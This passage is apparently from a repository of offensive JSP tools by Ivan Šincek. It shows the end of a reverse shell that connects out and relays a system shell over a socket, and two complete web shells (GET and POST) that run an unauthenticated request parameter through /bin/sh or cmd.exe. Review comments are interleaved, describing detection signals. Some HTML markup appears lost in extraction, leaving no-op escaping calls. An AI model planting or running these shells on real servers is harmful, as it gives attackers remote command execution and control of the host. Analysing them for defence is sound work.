89 | OutputStream stdin = null;
90 | InputStream stdout = null;
91 | InputStream stderr = null;
92 |
93 | try {
94 | client = new Socket();
// The read timeout is set before connect(); the connect() call itself is given no timeout.
95 | client.setSoTimeout(100);
96 | client.connect(this.addr);
97 | socin = client.getOutputStream();
98 | socout = client.getInputStream();
99 |
100 | this.buffer = new byte[1024];
101 |
102 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
103 | stdin = process.getOutputStream();
104 | stdout = process.getInputStream();
105 | stderr = process.getErrorStream();
106 |
107 | do {
108 | if (!process.isAlive()) {
109 | this.message = "PROC_ERROR: Shell process has been terminated\n"; break;
110 | }
111 | this.brw(socout, stdin, "SOCKET", "STDIN");
112 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
113 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
114 | } while (!this.error);
115 | } catch (IOException ex) {
116 | this.message = String.format("ERROR: %s\n", ex.getMessage());
117 | } finally {
// Cleanup order: child streams, child process, socket streams, socket, then the buffer
// contents are overwritten with zeros.
118 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
119 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
120 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
121 | if (process != null) { process.destroy(); }
122 |
123 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
124 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
125 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
126 |
127 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
128 | }
129 | }
130 | }
131 | }
132 | %>
133 |
134 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
135 |
136 | <%
// Review note (defensive reading): this scriptlet runs on every request to the page, with no
// authentication check and no request parameter involved. The remote endpoint is the literal
// in the constructor call below. sh.run() is called synchronously, so the HTTP request stays
// open for as long as the relay loop runs.
// NOTE(review): the two out.print() literals around the call look as if markup inside them was
// lost when this listing was extracted - confirm against the original file.
137 | out.print("");
138 | // change the host address and/or port number as necessary
139 | ReverseShell sh = new ReverseShell("127.0.0.1", 9000);
140 | sh.run();
// Any status or error text recorded by the class is written into the response as-is.
141 | if (sh.getMessage() != null) { out.print(sh.getMessage()); }
142 | sh = null;
143 | System.gc();
144 | out.print("
");
145 | %>
146 |
--------------------------------------------------------------------------------
/src/Web Shell/web/simple_jsp_web_shell_get.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others from accessing and using your web shell --%>
12 | <%-- you must URL encode your commands --%>
13 |
14 | <%
// Review note (defensive reading): this scriptlet takes the value of one GET parameter and has
// the server's command interpreter execute it, then places the captured output in the page.
// Nothing in the page authenticates the caller; the parameter name is the only gate.
// The command travels in the query string, so it normally appears in web-server access logs.
// On the host, each request shows up as a short-lived /bin/sh or cmd.exe child of the servlet
// container's JVM.
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
// The request value is formatted straight into the command string: untrusted input reaches
// Runtime.exec() with no validation. The "2>&1" suffix is meant to merge stderr into stdout.
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
// Reads until end of stream; each chunk is decoded as UTF-8 independently and appended.
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
// NOTE(review): as shown here both arguments of each replace() are identical, so the calls
// change nothing. The second argument was presumably an HTML entity lost when this listing was
// extracted - confirm against the original file. If they really are no-ops, command output is
// written into the HTML response unescaped.
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
// Cleanup: close the stream, destroy the child process, overwrite the buffer with zeros.
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 | <% out.print(output); output = null; System.gc(); %>
71 |
72 |
73 |
--------------------------------------------------------------------------------
/src/Web Shell/web/simple_jsp_web_shell_post.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others from accessing and using your web shell --%>
12 | <%-- don't forget to change the script name in the action attribute --%>
13 |
14 | <%
// Review note (defensive reading): same logic as the GET variant in this project, but the
// command is read from a POST parameter. The page has no authentication; the parameter name is
// the only gate.
// Because the value is in the request body, access logs that record only the request line will
// not show it. Process-creation telemetry (a /bin/sh or cmd.exe child of the servlet
// container's JVM) is the more dependable signal.
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
// The request value is formatted straight into the command string: untrusted input reaches
// Runtime.exec() with no validation. The "2>&1" suffix is meant to merge stderr into stdout.
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
// Reads until end of stream; each chunk is decoded as UTF-8 independently and appended.
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
// NOTE(review): as shown here both arguments of each replace() are identical, so the calls
// change nothing. The second argument was presumably an HTML entity lost when this listing was
// extracted - confirm against the original file. If they really are no-ops, command output is
// written into the HTML response unescaped.
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
// Cleanup: close the stream, destroy the child process, overwrite the buffer with zeros.
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 |
73 | <% out.print(output); output = null; System.gc(); %>
74 |
75 |
76 |
--------------------------------------------------------------------------------